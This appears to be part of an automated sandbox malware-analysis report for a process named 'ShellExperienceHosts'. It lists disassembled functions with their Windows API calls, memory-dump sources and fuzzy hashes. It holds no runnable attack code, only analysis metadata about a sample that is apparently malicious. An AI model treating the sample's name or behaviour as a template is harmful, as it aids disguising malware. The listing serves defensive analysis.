                                                                            Function 6C770B2B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Text$H_prolog3
                                                                            • String ID: 4<ml
                                                                            • API String ID: 1044789843-3878392967
                                                                            • Opcode ID: 601c2361fdcb4eb1cc09c9fffcce2f3191681a6b8e7817185291a3a393d2920c
                                                                            • Instruction ID: 9a4a2c6d08609e3fb1ba9e8710df3f0351e37ed972a836a147b750a56d25e335
                                                                            • Opcode Fuzzy Hash: 601c2361fdcb4eb1cc09c9fffcce2f3191681a6b8e7817185291a3a393d2920c
                                                                            • Instruction Fuzzy Hash: E021F132700119AFCF159FB4CD4899DB775BF49318B044239E52597A60DB31EA14DBA4
                                                                            Function 10013A50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ___BuildCatchObject.LIBCMT ref: 10013A63
                                                                              • Part of subcall function 100139BE: ___BuildCatchObjectHelper.LIBCMT ref: 100139F4
                                                                            • _UnwindNestedFrames.LIBCMT ref: 10013A7A
                                                                            • ___FrameUnwindToState.LIBCMT ref: 10013A88
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                            • String ID: csm$csm
                                                                            • API String ID: 2163707966-3733052814
                                                                            • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                            • Instruction ID: e6390535bab9e49693186baa48b022ad9d19c19648d68c038876df6954aae2ed
                                                                            • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                            • Instruction Fuzzy Hash: AE01F675401109BBDF12DF51CC45EAB7F6AEF08390F508024FD5819121D776E9B1DBA1
                                                                            Function 6C6F6F6C Relevance: 7.9, APIs: 5, Instructions: 434windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$H_prolog3Visible
                                                                            • String ID:
                                                                            • API String ID: 3969123015-0
                                                                            • Opcode ID: e02c45a351f37cbe4b5f58eae5e8a889a1b116f5b310cc343de82e08ccb85330
                                                                            • Instruction ID: 9f5ad1923ee334f11f5a37f6cc9075edc326b13c53ef28ebfcbab1e2e123ce2a
                                                                            • Opcode Fuzzy Hash: e02c45a351f37cbe4b5f58eae5e8a889a1b116f5b310cc343de82e08ccb85330
                                                                            • Instruction Fuzzy Hash: C5F19F71B012159BCF05CB64C858AED77B7BF89318F240169E922E7780DF34AD06CB98
                                                                            Function 6C6F8CE4 Relevance: 7.8, APIs: 5, Instructions: 276windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C73913E: GetParent.USER32(?), ref: 6C73916A
                                                                            • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 6C6F8D35
                                                                            • IsWindow.USER32(?), ref: 6C6F8FDF
                                                                            • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 6C6F900C
                                                                            • GetParent.USER32(?), ref: 6C6F9015
                                                                            • RedrawWindow.USER32(?,00000000,00000000,00000185,00000000), ref: 6C6F902D
                                                                              • Part of subcall function 6C6F636E: GetClientRect.USER32(?,?), ref: 6C6F63FF
                                                                              • Part of subcall function 6C6F636E: IsRectEmpty.USER32(?), ref: 6C6F6409
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: MessageParentRectSendWindow$ClientEmptyRedraw
                                                                            • String ID:
                                                                            • API String ID: 1906000866-0
                                                                            • Opcode ID: 174f064a422b96dc75eb60ece2586a961d9b66b1ce0b68ac95919d68d4ee6bb8
                                                                            • Instruction ID: a6f5d1ff6bddcf65e5f648a1d09a71e45f09df0195df29828cae0aa5455c551a
                                                                            • Opcode Fuzzy Hash: 174f064a422b96dc75eb60ece2586a961d9b66b1ce0b68ac95919d68d4ee6bb8
                                                                            • Instruction Fuzzy Hash: 1BA19374B012159FDF059F25C458BAD7BB6BF89348F2401AAE826E7390DB30A902CF94
                                                                            Function 6C6E8A1F Relevance: 7.7, APIs: 5, Instructions: 233COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 6C6E8AA4
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: RectWindow
                                                                            • String ID:
                                                                            • API String ID: 861336768-0
                                                                            • Opcode ID: 6d3c6f0c715076dd25eeecb9ba32e115cf1502329035896aea13c2b7c5664cb2
                                                                            • Instruction ID: 99106331aa95d6b9422d3132a7a9e2f56b2a49b146114186687f3c2ae10464b2
                                                                            • Opcode Fuzzy Hash: 6d3c6f0c715076dd25eeecb9ba32e115cf1502329035896aea13c2b7c5664cb2
                                                                            • Instruction Fuzzy Hash: D3818D74B01215AFCF059F68C898ABEBBB5BF8D348F14016AE916A7390DB346D01CF95
                                                                            Function 6C7CED01 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C7708FD: GetWindowLongW.USER32(?,000000F0), ref: 6C77090A
                                                                            • GetWindowRect.USER32(?,?), ref: 6C7CED2E
                                                                            • GetSystemMetrics.USER32(00000021), ref: 6C7CED36
                                                                            • GetSystemMetrics.USER32(00000020), ref: 6C7CED40
                                                                            • GetKeyState.USER32(00000002), ref: 6C7CED64
                                                                            • InflateRect.USER32(?,?,00000000), ref: 6C7CED9D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsRectSystemWindow$InflateLongState
                                                                            • String ID:
                                                                            • API String ID: 2406722796-0
                                                                            • Opcode ID: 2778e01d63a2854de4fc1812a6a843123a0b561c6d7cad8a7d53a5531c3af3f2
                                                                            • Instruction ID: 3264ba7c3f8c0c51a2e2e12985643e2dd7bd9efe49268796c1f913736ecedf0c
                                                                            • Opcode Fuzzy Hash: 2778e01d63a2854de4fc1812a6a843123a0b561c6d7cad8a7d53a5531c3af3f2
                                                                            • Instruction Fuzzy Hash: 7B319232B4021E9FEB109AB8CA5BBBE77B4EF45794F204535E511EB580DA70D980C7D1
                                                                            Function 6C720FED Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ClientCursorScreen$Rect
                                                                            • String ID:
                                                                            • API String ID: 1082406499-0
                                                                            • Opcode ID: 0f3f079ac4125ed543177f6368eb95e9d637e6fc9db9f14f848c1205f88d7370
                                                                            • Instruction ID: 7b4da1d073a44002b46378fdcd1f71b0343c04aa73f3940279a162b073152064
                                                                            • Opcode Fuzzy Hash: 0f3f079ac4125ed543177f6368eb95e9d637e6fc9db9f14f848c1205f88d7370
                                                                            • Instruction Fuzzy Hash: F6314971E0020AAFCF15DFA4C984AEEB7B5BF49208F10023AD516A3640DB3AAD45CB91
                                                                            Function 6C714E3B Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001014,?,00000000), ref: 6C714EFC
                                                                            • SendMessageW.USER32(?,00000114,?,00000000), ref: 6C714F10
                                                                            • SetScrollPos.USER32(?,00000002,00000000,00000001), ref: 6C714F31
                                                                            • GetParent.USER32(?), ref: 6C714F41
                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 6C714F59
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ParentScroll
                                                                            • String ID:
                                                                            • API String ID: 375824706-0
                                                                            • Opcode ID: 846578a62cbc8f95ce97130a474470bff39e4e7d88ee06ca59a27df7ca6ce901
                                                                            • Instruction ID: 2c122244c9e2b4ed8992704d835935624fdec0a3a537552e857411fc4c19d315
                                                                            • Opcode Fuzzy Hash: 846578a62cbc8f95ce97130a474470bff39e4e7d88ee06ca59a27df7ca6ce901
                                                                            • Instruction Fuzzy Hash: 6C31B070304205BFDF1A8F20CA89FAA777AFB4835DF084229F5265BAA0D7719855DB90
                                                                            Function 6C700D0E Relevance: 7.6, APIs: 5, Instructions: 94memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindResourceW.KERNEL32(?,?,00000006,00000000,?,?,?,?,6C6B201F,00000000,?,?), ref: 6C6B4DF4
                                                                            • LoadResource.KERNEL32(?,00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E08
                                                                            • LockResource.KERNEL32(00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E1A
                                                                            • SizeofResource.KERNEL32(?,00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E28
                                                                            • SysAllocStringLen.OLEAUT32(?,?), ref: 6C700D14
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$AllocFindLoadLockSizeofString
                                                                            • String ID:
                                                                            • API String ID: 913082835-0
                                                                            • Opcode ID: 08c98b044d3d4bc85c0401bf8095f00231cd35a4e87cdfd6089767d9914b5292
                                                                            • Instruction ID: 04a7e08634817465fdcfc3aec4dbd9ce99fd1d5c055e4a7b7966f7dd1dacb1b7
                                                                            • Opcode Fuzzy Hash: 08c98b044d3d4bc85c0401bf8095f00231cd35a4e87cdfd6089767d9914b5292
                                                                            • Instruction Fuzzy Hash: B121F3316012246BDB204F258C88A3B37ACEF46759B118429FC10EB290E7B5D827C7A9
                                                                            Function 6C714D5C Relevance: 7.6, APIs: 5, Instructions: 79windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?), ref: 6C714D96
                                                                            • MapWindowPoints.USER32(?,?,?,00000002), ref: 6C714DA8
                                                                            • PtInRect.USER32(?,?,?), ref: 6C714DB8
                                                                            • MapWindowPoints.USER32(?,?,?,00000001), ref: 6C714DF3
                                                                            • SendMessageW.USER32(?,00000203,?,?), ref: 6C714E12
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: PointsRectWindow$ClientMessageSend
                                                                            • String ID:
                                                                            • API String ID: 3885650166-0
                                                                            • Opcode ID: c8617eb355138279fd4a25a7ddf61dd2c3b1ba77a3d2a2766a7410470f32b4d6
                                                                            • Instruction ID: 62624f9e32b2de5057c4dc00a7379179958444fe3f7b66a548baa7c3c86daade
                                                                            • Opcode Fuzzy Hash: c8617eb355138279fd4a25a7ddf61dd2c3b1ba77a3d2a2766a7410470f32b4d6
                                                                            • Instruction Fuzzy Hash: FF216F31A00209EBCF158F64C958DBEBBB9FF49309B144129F94697650EB31EE14DB90
                                                                            Function 02234037 Relevance: 7.6, APIs: 5, Instructions: 78memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 0223404B
                                                                              • Part of subcall function 022313F7: HeapFree.KERNEL32(?,00000000,?,?,?,02234088,?,00000000,02234010,?,10015054,0223361F), ref: 02231414
                                                                            • HeapDestroy.KERNEL32(?,?,00000000,02234010,?,10015054,0223361F), ref: 02234090
                                                                            • HeapCreate.KERNEL32(?,?,?,?,00000000,02234010,?,10015054,0223361F), ref: 022340AB
                                                                            • SetEvent.KERNEL32(?,?,00000000,02234010,?,10015054,0223361F), ref: 02234127
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0223412E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$CriticalSection$CreateDestroyEnterEventFreeLeave
                                                                            • String ID:
                                                                            • API String ID: 563679510-0
                                                                            • Opcode ID: a47338e344b9415d0666abf4aacaa3da54f4cea86e3874ea6b078b9e747c069c
                                                                            • Instruction ID: 224cf53adfd892736bb4913e24e85abb70d922bd8a0aea5c54fd972bfee8ad22
                                                                            • Opcode Fuzzy Hash: a47338e344b9415d0666abf4aacaa3da54f4cea86e3874ea6b078b9e747c069c
                                                                            • Instruction Fuzzy Hash: DF315CB0610A02EFD70ADBB4C888B95F7A5FF48315F148249E4298B660CB35F855CFD0
                                                                            Function 6C70CAD9 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C6E2BB1: __EH_prolog3.LIBCMT ref: 6C6E2BB8
                                                                              • Part of subcall function 6C6E2BB1: GetDC.USER32(00000000), ref: 6C6E2BE4
                                                                            • IsRectEmpty.USER32(?), ref: 6C70CB00
                                                                            • InvertRect.USER32(?,?), ref: 6C70CB0E
                                                                            • SetRectEmpty.USER32(?), ref: 6C70CB1E
                                                                            • GetClientRect.USER32(?,?), ref: 6C70CB35
                                                                            • InvertRect.USER32(?,?), ref: 6C70CB80
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$EmptyInvert$ClientH_prolog3
                                                                            • String ID:
                                                                            • API String ID: 1656078942-0
                                                                            • Opcode ID: d987a7ed954987d0e646d149c30e9950e3499e001ea59721c89203cf4c70cfa1
                                                                            • Instruction ID: 55fc513f71256ebf2a659bb9c52f1e61227aa07eb3a9126cc99a1d0b9fa769e9
                                                                            • Opcode Fuzzy Hash: d987a7ed954987d0e646d149c30e9950e3499e001ea59721c89203cf4c70cfa1
                                                                            • Instruction Fuzzy Hash: D0212CB1A006099FCB15DF78C9849EEBBF9FF09319F14412DE406A7600DB31AE85CBA4
                                                                            Function 1000E5D7 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 1000E5E5
                                                                              • Part of subcall function 10006E83: __FF_MSGBANNER.LIBCMT ref: 10006E9C
                                                                              • Part of subcall function 10006E83: __NMSG_WRITE.LIBCMT ref: 10006EA3
                                                                              • Part of subcall function 10006E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006EC8
                                                                            • _free.LIBCMT ref: 1000E5F8
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap_free_malloc
                                                                            • String ID:
                                                                            • API String ID: 1020059152-0
                                                                            • Opcode ID: 073510cd7888ec162256f41c4b27844541b3ac2ad2a228e050a5b5aba56439fd
                                                                            • Instruction ID: 99b6cfc0e9903126c7bed8e87128f69c37c5ff73db012c927cbf40cb5b0e6f66
                                                                            • Opcode Fuzzy Hash: 073510cd7888ec162256f41c4b27844541b3ac2ad2a228e050a5b5aba56439fd
                                                                            • Instruction Fuzzy Hash: 2F113A36900A61ABFB229BB4BC0564E37D5FF443F1B214525F848BB198DF36DD404B94
                                                                            Function 6C7A884A Relevance: 7.6, APIs: 5, Instructions: 67windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C7A8851
                                                                            • SendMessageW.USER32(00000000,0000007F,00000000,00000000), ref: 6C7A8874
                                                                            • SendMessageW.USER32(00000000,0000007F,00000001,00000000), ref: 6C7A8888
                                                                            • GetClassLongW.USER32(00000000,000000DE), ref: 6C7A88E5
                                                                            • GetClassLongW.USER32(00000000,000000F2), ref: 6C7A88F6
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
